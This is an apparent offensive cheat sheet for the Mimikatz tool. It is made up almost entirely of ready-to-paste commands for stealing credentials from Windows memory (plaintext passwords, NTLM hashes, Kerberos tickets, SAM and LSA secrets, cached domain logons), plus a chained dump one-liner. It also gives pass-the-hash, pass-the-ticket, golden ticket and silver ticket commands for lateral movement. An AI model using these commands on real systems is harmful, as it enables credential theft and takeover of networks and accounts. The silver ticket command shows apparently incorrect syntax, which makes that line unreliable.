🥝Mimikatz Basics

Mimikatz is a powerful tool to extract plaintext credentials, hashes, and Kerberos tickets from memory. Typically run with Administrator or SYSTEM privileges, it’s vital for Windows privilege escalation and lateral movement.

---

Basic Commands

mimikatz.exe
privilege::debug
token::elevate

Extracting Credentials

Oneliner

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"

Get NTLM Hashes from LSASS:

sekurlsa::logonpasswords

Dump Kerberos Tickets

sekurlsa::tickets /export

Dump Credential Manager

vault::cred

SAM Database

lsadump::sam

LSA Secrets

lsadump::secrets

Cached Domain Credentials

lsadump::cache

Lateral Movement

Pass-the-Hash Attack

sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<command>

Pass The Ticket

kerberos::ptt <ticket.kirbi>

Golden Ticket

kerberos::golden /user:<username> /domain:<domain> /sid:<domain SID> /krbtgt:<krbtgt hash> /id:<RID> /target:<target FQDN> /renewmax:<duration> /ptt

Silver Ticket

kerberos::tgt::golden /user:<username> /domain:<domain> /sid:<domain SID> /service:<service> /target:<target FQDN> /rc4:<hash> /id:<RID> /ptt

Overpass-the-Hash

sekurlsa::pth /user:<username> /domain:<domain> /aes256:<AES key> /run:<command>